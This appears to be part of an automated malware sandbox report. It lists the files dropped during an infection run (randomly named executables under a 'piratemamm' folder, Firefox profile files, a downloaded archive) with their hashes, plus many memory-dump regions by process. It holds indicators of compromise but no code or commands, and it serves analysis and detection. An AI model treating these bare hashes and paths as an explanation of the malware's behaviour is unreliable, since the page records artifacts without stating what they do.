C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\datareporting\glean\pending_pings\c674877b-8317-4b2d-8fe6-08fe1673e929

Filesize
659B

MD5
ab59503793a14c5bc4f001d6b0b9031d

SHA1
facd46450e8b9ff37d4783b488008e2fefa972cd

SHA256
e9c798b7028af6a085ec99f25d7468bc55496aed2f1e22d5efc461c587f163a9

SHA512
6be4151868921f11b42dbe8abc2c21b21b1b4610ef41f784f20f5bb1f7443f7507f960a6ade59546aec6c212def852d1f061ea5197ad591e4ec916acf381b494

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\zrrtvxky.default-release\prefs-1.js

Filesize
10KB

MD5
15adb135c2e7931bf65def1b6d1f0e6d

SHA1
68a594f7f3956489117a8adb24772bd58de11a59

SHA256
69942f40658cd9ee3db7ff765f06d715f44d1768e33c1bf002fd74175cf01a3a

SHA512
fb6820a20b02b5b02bdde411648dab1477b46abd08924a32489a3e2ba9e3fb09f50eaa43c85ed23e665382e6372088249e7d6b1c4a60a49f8ce205c0c981c249

Download Submit
C:\Users\Admin\Documents\piratemamm\3NcWoIwM1AbzK3IQPHPOLtww.exe

Filesize
4.5MB

MD5
63f9882f056722b75da5e19a4a3d8b88

SHA1
c2e3569e82ceacacf67d97e8962f0281dd74af1f

SHA256
f7e4677e3b3ef407b46b797cd1f6ceeb5e270bdfef24a564ebcc95153cf863e9

SHA512
163a0c82f4c92916b6e33564578f48ef6fbfffd4b95097d303dacdaf277b29c5356bac8dc8a47516298512d09f381e621f4b577871b04b7c340e028af7ef9e22

Download Submit
C:\Users\Admin\Documents\piratemamm\5cL0hbP2BlOOlA3K24bN_Kgl.exe

Filesize
1.8MB

MD5
21eb3de735b3c80ed46741710e2aaad0

SHA1
fc60dc906acaddc78ba5082680597a75bc7d03e2

SHA256
16a6eb46b27ea1ccc082ff0fb39a573ccdc9e6e73d97e946893fb99fc69a3667

SHA512
857ff4768afac5cb9052ae72016f1e1b5d612b728801d201fd1eb5af8c2b3020214b56a90e4529b0d8b6ccbe8e15761e30024a6be00629ba23bd16aafdc7bdfb

Download Submit
C:\Users\Admin\Documents\piratemamm\6WkPkBp_qxEUAf7fdQsFQqRE.exe

Filesize
7.2MB

MD5
57b3b13932bc8227a02e8aeaf6470c3b

SHA1
36cbf016c84405344b051ea85d5e1ab298803a39

SHA256
14f1711c5c9caf193c8ff0b697977707361b77f3ce1d81a611b57307369617ea

SHA512
45dca69eed3d1b2af890c2126417b364eea3c4222d13e6852e55c07cb7adb977156804a9b21beeda18d055ab01d544e0aeadd76ca621e1a2aaf4009767135c1c

Download Submit
C:\Users\Admin\Documents\piratemamm\D_IyF2JVTdF3h_AcBm4TwEC1.exe

Filesize
214KB

MD5
07058a7bea05264eb9281e609d78659d

SHA1
7a3c5280b9ad50af3f2e150344f504c85988ef6f

SHA256
65d36b9f8538fe941909eafcd3def929dad1cb32e1975a65e7d591e627616d79

SHA512
520084ce9a6d62f464ab434f3b0631647f986b14155ae54e6e1e283fe562a2515dc02d0aa5043015139c62da2fe7483b8a3f0bb0ec29a9d5c96d2961405ba32d

Download Submit
C:\Users\Admin\Documents\piratemamm\JYqzDWcCifBR2B3OjSuXyEcL.exe

Filesize
3.9MB

MD5
f9e341ea64be4ee1007755cd909aaa8c

SHA1
f4802215158d24392f6585915684d8a1d57ac765

SHA256
8a415b9465a573bf7fdfeb18fc3abe3c5ab53536dfe9d144fe768f180d077cce

SHA512
e677c9e51f075dd4bf1887f12e6ead7fd70faddcc3d8d5bf7defb68d7d797f8ccb9347eeca69d38d58ceb915434fa599699f114ad8fec9ffc3750ca67ff85033

Download Submit
C:\Users\Admin\Documents\piratemamm\shYdB1lAKdOjVl1A3sVBsMCM.exe

Filesize
4.5MB

MD5
a3ea4539a561ed60d0e40ca8688edcd9

SHA1
9293586d2b48f47941159dd87af5892f76b1260e

SHA256
76e9259ead06e761cd3d3c1a455cb22d1afbc9ca435de843cbc337437a899d6e

SHA512
5ac1b2ed5bb24cc390c5370363c80441fb58628fb512440b586536c6bbf2548a6012419390e89584a7f6712910f0611b446bace2165209db60cf266e8d9ddd8a

Download Submit
C:\Users\Admin\Documents\piratemamm\w74QkkuBF85hmDyo3WP13d2g.exe

Filesize
1.8MB

MD5
693a5133f437df45bc838decc20850c0

SHA1
3a10b3a1b3a923a04eff71fcefd5e89f0d78ed45

SHA256
ade52f8eb40f36f032b612cbc663db664006db096607da2a506aad0a9fcfd3ba

SHA512
bcc489ee9a86c827e996e18d95991afd698accfbd34711700b05a1849a5ed0159c8b53ead4c1d1952c4c0b3156da1944feb0c967b2b983fcee1118387f34e11a

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 216734.crdownload

Filesize
16.9MB

MD5
820ef22a10dbfb06206b3edd168f27bb

SHA1
b2e88bb8847d00a95505044d2c1944da034786b7

SHA256
9c99a6e0e4adda488a810086986a1336f25283a85f9a1dc5f6d1358d8e639df2

SHA512
7820e7a4ca4de384430f0130446a851704230fa5b05c2d9cbf82fb55ab36d2d2646ef9bad38742a12a3b38f5a02ed27c02f51a3fe1723d3a4b6bfc63c0c8e970

Download Submit
C:\Users\Admin\Downloads\archive.7z

Filesize
16.9MB

MD5
ebb56b8a9b8bc63b55ce8d18af8eab2a

SHA1
a9ab905180135f68d215f49b6d57471df6b5569f

SHA256
d7b5f30caa3f18578760d50ea5823254848c4f42561523b186ed89436f6bfa0b

SHA512
71fde81ba34976ce0524862583aba10c25f89d38846ebc125b615ba2b7fb09b88723f1a2545169b3726ff0ed8a4cf05e9d35619a376bd1f2cc2312bd48417ba1

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
7cc972a3480ca0a4792dc3379a763572

SHA1
f72eb4124d24f06678052706c542340422307317

SHA256
02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5

SHA512
ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7

Download Submit
memory/220-352-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-536-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-538-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-534-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-544-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-546-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-357-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-475-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-349-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-351-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-476-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-359-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-540-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-350-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-529-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-542-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-353-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-532-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-356-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-358-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-338-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-339-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-355-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-341-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/220-354-0x0000021287270000-0x000002128741E000-memory.dmp

Filesize
1.7MB

Download
memory/424-730-0x0000000004CA0000-0x00000000052C8000-memory.dmp

Filesize
6.2MB

Download
memory/424-731-0x0000000004A50000-0x0000000004A72000-memory.dmp

Filesize
136KB

Download
memory/424-735-0x00000000054F0000-0x0000000005844000-memory.dmp

Filesize
3.3MB

Download
memory/424-732-0x0000000004BF0000-0x0000000004C56000-memory.dmp

Filesize
408KB

Download
memory/424-758-0x0000000005B30000-0x0000000005B4E000-memory.dmp

Filesize
120KB

Download
memory/424-728-0x0000000002220000-0x0000000002256000-memory.dmp

Filesize
216KB

Download
memory/424-762-0x00000000060E0000-0x0000000006176000-memory.dmp

Filesize
600KB

Download
memory/424-733-0x0000000005440000-0x00000000054A6000-memory.dmp

Filesize
408KB

Download
memory/424-764-0x0000000006060000-0x0000000006082000-memory.dmp

Filesize
136KB

Download
memory/424-763-0x0000000006040000-0x000000000605A000-memory.dmp

Filesize
104KB

Download
memory/944-903-0x0000000000CD0000-0x0000000000F13000-memory.dmp

Filesize
2.3MB

Download
memory/1228-879-0x00000000009B0000-0x0000000000A02000-memory.dmp

Filesize
328KB

Download
memory/1808-723-0x0000000000840000-0x0000000000D01000-memory.dmp

Filesize
4.8MB

Download
memory/1808-725-0x0000000000840000-0x0000000000D01000-memory.dmp

Filesize
4.8MB

Download
memory/2060-547-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2096-885-0x0000000009240000-0x0000000009402000-memory.dmp

Filesize
1.8MB

Download
memory/2096-856-0x0000000000010000-0x0000000000096000-memory.dmp

Filesize
536KB

Download
memory/2096-886-0x0000000009940000-0x0000000009E6C000-memory.dmp

Filesize
5.2MB

Download
memory/2156-687-0x0000000000400000-0x000000000078B000-memory.dmp

Filesize
3.5MB

Download
memory/2156-902-0x0000000000400000-0x000000000078B000-memory.dmp

Filesize
3.5MB

Download
memory/2500-466-0x0000023151EE0000-0x000002315208E000-memory.dmp

Filesize
1.7MB

Download
memory/2500-465-0x0000023151EE0000-0x000002315208E000-memory.dmp

Filesize
1.7MB

Download
memory/2540-699-0x0000000005C20000-0x0000000005D2A000-memory.dmp

Filesize
1.0MB

Download
memory/2540-685-0x0000000005D80000-0x0000000006324000-memory.dmp

Filesize
5.6MB

Download
memory/2540-683-0x0000000000400000-0x0000000000452000-memory.dmp

Filesize
328KB

Download
memory/2540-686-0x00000000058B0000-0x0000000005942000-memory.dmp

Filesize
584KB

Download
memory/2540-690-0x0000000005870000-0x000000000587A000-memory.dmp

Filesize
40KB

Download
memory/2540-697-0x0000000006950000-0x0000000006F68000-memory.dmp

Filesize
6.1MB

Download
memory/2540-701-0x0000000005B50000-0x0000000005B8C000-memory.dmp

Filesize
240KB

Download
memory/2540-702-0x0000000005BA0000-0x0000000005BEC000-memory.dmp

Filesize
304KB

Download
memory/2540-700-0x00000000059F0000-0x0000000005A02000-memory.dmp

Filesize
72KB

Download
memory/3100-2005-0x0000000000EC0000-0x000000000157E000-memory.dmp

Filesize
6.7MB

Download
memory/3100-1104-0x0000000000EC0000-0x000000000157E000-memory.dmp

Filesize
6.7MB

Download
memory/3264-995-0x000001D568C60000-0x000001D568C66000-memory.dmp

Filesize
24KB

Download
memory/3264-1018-0x000001D568CD0000-0x000001D568D2A000-memory.dmp

Filesize
360KB

Download
memory/3264-984-0x000001D5688C0000-0x000001D5688CA000-memory.dmp

Filesize
40KB

Download
memory/3592-963-0x0000000000840000-0x0000000000D01000-memory.dmp

Filesize
4.8MB

Download
memory/3592-1140-0x0000000000840000-0x0000000000D01000-memory.dmp

Filesize
4.8MB

Download
memory/3604-962-0x0000000000D40000-0x00000000011DC000-memory.dmp

Filesize
4.6MB

Download
memory/3604-967-0x0000000000D40000-0x00000000011DC000-memory.dmp

Filesize
4.6MB

Download
memory/3740-1017-0x0000000000CF0000-0x0000000000D42000-memory.dmp

Filesize
328KB

Download
memory/3740-1090-0x0000000007200000-0x0000000007250000-memory.dmp

Filesize
320KB

Download
memory/3780-551-0x0000000000B40000-0x0000000000FDC000-memory.dmp

Filesize
4.6MB

Download
memory/3780-721-0x0000000000B40000-0x0000000000FDC000-memory.dmp

Filesize
4.6MB

Download
memory/3996-727-0x0000000000BC0000-0x0000000001081000-memory.dmp

Filesize
4.8MB

Download
memory/3996-550-0x0000000000BC0000-0x0000000001081000-memory.dmp

Filesize
4.8MB

Download
memory/4132-1050-0x00000225CFF30000-0x00000225CFF52000-memory.dmp

Filesize
136KB

Download
memory/4192-1141-0x0000000000F60000-0x0000000001A36000-memory.dmp

Filesize
10.8MB

Download
memory/4192-2014-0x0000000000F60000-0x0000000001A36000-memory.dmp

Filesize
10.8MB

Download
memory/4220-913-0x0000000000100000-0x00000000007BE000-memory.dmp

Filesize
6.7MB

Download
memory/4220-703-0x0000000000100000-0x00000000007BE000-memory.dmp

Filesize
6.7MB

Download
memory/4332-2034-0x0000000000400000-0x0000000000FF6000-memory.dmp

Filesize
12.0MB

Download
memory/4540-881-0x0000000009920000-0x000000000993E000-memory.dmp

Filesize
120KB

Download
memory/4540-857-0x0000000000F80000-0x0000000001004000-memory.dmp

Filesize
528KB

Download
memory/4540-880-0x0000000009960000-0x00000000099D6000-memory.dmp

Filesize
472KB

Download
memory/4656-722-0x0000000000D40000-0x00000000011DC000-memory.dmp

Filesize
4.6MB

Download
memory/4656-923-0x0000000000D40000-0x00000000011DC000-memory.dmp

Filesize
4.6MB

Download
memory/4664-964-0x0000000000100000-0x00000000007BE000-memory.dmp

Filesize
6.7MB

Download
memory/4664-1105-0x0000000000100000-0x00000000007BE000-memory.dmp

Filesize
6.7MB

Download
memory/4784-761-0x0000000000400000-0x0000000000452000-memory.dmp

Filesize
328KB

Download
memory/4824-561-0x0000000000230000-0x0000000000D0B000-memory.dmp

Filesize
10.9MB

Download
memory/4824-562-0x0000000000230000-0x0000000000D0B000-memory.dmp

Filesize
10.9MB

Download
memory/4824-559-0x0000000000230000-0x0000000000D0B000-memory.dmp

Filesize
10.9MB

Download
memory/4824-556-0x0000000000230000-0x0000000000D0B000-memory.dmp

Filesize
10.9MB

Download
memory/4824-575-0x0000000000230000-0x0000000000D0B000-memory.dmp

Filesize
10.9MB

Download
memory/4824-574-0x0000000000230000-0x0000000000D0B000-memory.dmp

Filesize
10.9MB

Download
memory/4824-862-0x0000000000230000-0x0000000000D0B000-memory.dmp

Filesize
10.9MB

Download
memory/4824-560-0x0000000000230000-0x0000000000D0B000-memory.dmp

Filesize
10.9MB

Download
memory/4928-679-0x0000000000400000-0x000000000078B000-memory.dmp

Filesize
3.5MB

Download
memory/4932-994-0x0000000004B30000-0x0000000004E84000-memory.dmp

Filesize
3.3MB

Download
memory/4960-642-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-558-0x0000000005400000-0x0000000005788000-memory.dmp

Filesize
3.5MB

Download
memory/4960-617-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-618-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-624-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-644-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-608-0x0000000002D00000-0x0000000002D1C000-memory.dmp

Filesize
112KB

Download
memory/4960-573-0x0000000005790000-0x00000000058E0000-memory.dmp

Filesize
1.3MB

Download
memory/4960-620-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-640-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-622-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-626-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-557-0x0000000005360000-0x00000000053FC000-memory.dmp

Filesize
624KB

Download
memory/4960-555-0x00000000004E0000-0x000000000095A000-memory.dmp

Filesize
4.5MB

Download
memory/4960-636-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-638-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-634-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-632-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-628-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/4960-630-0x0000000002D00000-0x0000000002D15000-memory.dmp

Filesize
84KB

Download
memory/6308-2050-0x0000000000460000-0x00000000006A3000-memory.dmp

Filesize
2.3MB

Download
memory/6336-2053-0x0000000000D40000-0x00000000011DC000-memory.dmp

Filesize
4.6MB

Download
memory/6336-2055-0x0000000000D40000-0x00000000011DC000-memory.dmp

Filesize
4.6MB

Download